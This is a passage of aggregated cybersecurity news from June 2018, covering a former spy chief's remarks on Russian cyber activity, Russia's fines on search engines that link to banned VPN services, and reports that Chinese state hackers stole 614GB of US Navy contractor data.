“It’s unclear if that was a mistake or an experiment,” Hannigan said. “Russia seems to be live testing things in cyber, as it has been [on the ground] in Syria, but it’s a doctrine we don’t fully understand.”

The former spy chief highlighted the risks associated with state-sponsored malware like WannaCry that caused billion dollars damages to organizations worldwide and severe problems to critical infrastructures, like hospitals in the UK.

“The problem is that the risk of miscalculation is huge,” Hannigan warned.

Search Engines in Russia cannot link to banned VPN services and Internet proxy services
10.6.2018 securityaffairs BigBrothers 

Russia strengthens online censorship by announcing fines for search engines that link to VPN serviced banned in the country.
Russian Government has approved a new bill to punish search engines that are not aligned with Moscow and that allows its users to find VPN services, and anonymization tools that allow circumventing the censorship.

According to the amendments to the Code of Administrative Offenses of the Russian Federation, Duma will also impose fines on search engines if they will continue to provide results about queries on an up-to-date database of blocked domains upon users’ request.

Fines for individuals will range between 3,000 and 5,000 rubles (roughly $48 to $80), while officials will face fines up to 50,000 rubles (roughly $800), and legal entities will face fines between 500,000 to 700,000 (roughly $8,019 to $11,227).

“The failure of the operator to perform the search system to connect to this system “entails the imposition of an administrative fine on citizens in the amount of three thousand to five thousand rubles; on officials – from thirty thousand to fifty thousand rubles; on legal entities – from five hundred thousand to seven hundred thousand rubles, “- reads the press release published by the Duma.

Russians ordinary use VPN services and other anonymizing services to access blocked content and bypass censorship, in the following graph we can see the continuous growth for the number of Tor users in Russia.

Search Engines Tor User VPN Russia

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the Government regularity authority.

Since May 3rd, 2018, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

However, many VPNs and Internet proxy services still haven’t complained about the country law by registering themselves, for this reason, Moscow introduced fines for search engines.

The Russian communications watchdog Roskomnadzor will also provide a Federal State Information System (FGIS) containing the list of banned websites and services in the country, and search engines will need to update the results they provide by connecting to FGIS.

Search engines have 30 days to be aligned with Federal State Information System (FGIS) if the service providers

Those who fail to connect to this system will also face fines similar to those detailed above.

In May, the Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.

Chinese state-sponsored hackers steal 600GB U.S. Navy data
9.6.2018 securityaffairs BigBrothers 

According to a report published by The Washington Post, Chinese hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor.
China-linked hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor, the Washington Post reported Friday. The threat actors stole more than 614 gigabytes of data including secret plans to develop a new type of submarine-launched anti-ship missile.

The Washington Post was informed by government officials that spoke on the condition of anonymity.

According to the Washington Post, the security breach took place in January and February, the hackers belong to a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The report published by the media outlet doesn’t reveal the name of the U.S. Navy contractor, it only reports that works for the Naval Undersea Warfare Center, based in Newport, Rhode Island.

“Chinese government hackers have compromised the computers of a Navy contractor, stealing massive amounts of highly sensitive data related to undersea warfare — including secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020, according to American officials.” states the report published by the Washington Post.

“The hackers targeted a contractor who works for the Naval Undersea Warfare Center, a military organization headquartered in Newport, R.I., that conducts research and development for submarines and underwater weaponry.”

Stolen data included unclassified information relating to submarine cryptographic systems, signals and sensor data, and a project called Sea Dragon.

The project Sea Dragon was launched by the Pentagon to extend existing US military technologies for new applications, the US Government already spent more than $300 million for the initiative since 2015.

“The Defense Department, citing classification levels, has released little information about Sea Dragon other than to say that it will introduce a “disruptive offensive capability” by “integrating an existing weapon system with an existing Navy platform.” continues the post.

“The Pentagon has requested or used more than $300 million for the project since late 2015 and has said it plans to start underwater testing by September.”

U.S. Navy chinese hackers

At the time, the U.S. Navy did not comment on the incident for security reason.

“There are measures in place that require companies to notify the government when a ‘cyber incident’ has occurred that has actual or potential adverse effects on their networks that contain controlled unclassified information.” said Cmdr. Bill Speaks, a U.S. Navy spokesman,

“it would be inappropriate to discuss further details at this time.”

“Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities,” he told AFP.

This incident is the last in order of time, Chinese hackers already stole in the past sensitive information from the US military such as the blueprint of the F-35 stealth fighter, the advanced Patriot PAC-3 missile system, and other highly secret projects.

Chinese Government Hackers Steal Trove of U.S. Navy Data: Report

9.6.2018 securityweek BigBrothers

Chinese government hackers have stolen a massive trove of sensitive information from a US Navy contractor, including secret plans to develop a new type of submarine-launched anti-ship missile, the Washington Post reported Friday.

Investigators told the newspaper that breaches were executed in January and February by a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The contractor, which was not named in the report, works for the Naval Undersea Warfare Center, based in Newport, Rhode Island. It conducts research and development for submarines and underwater weapons systems.

According to the Post, hackers swiped 614 gigabytes of data that included information relating to sensors, submarine cryptographic systems and a little-known project called Sea Dragon.

The Pentagon has not said much about Sea Dragon, launched in 2012, except that it is aimed at adapting existing military technologies to new uses.

At the Navy's request, the Post withheld information about the compromised new missile system, but said it was for a supersonic anti-ship missile that could be launched from submarines.

Navy spokesman Commander Bill Speaks declined to confirm the Post report, citing security reasons.

"Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities," he told AFP.

Chinese hackers have for years targeted the US military to steal information and the Pentagon says they have previously swiped crucial data on the new F-35 stealth fighter, the advanced Patriot PAC-3 missile system and other highly sensitive projects.

News of the hack comes amid rising tensions between Beijing and Washington on a range of issues including trade and military matters.

The Pentagon last month pulled its invitation for China to join maritime exercises in the Pacific because of Beijing's "continued militarization" of the South China Sea.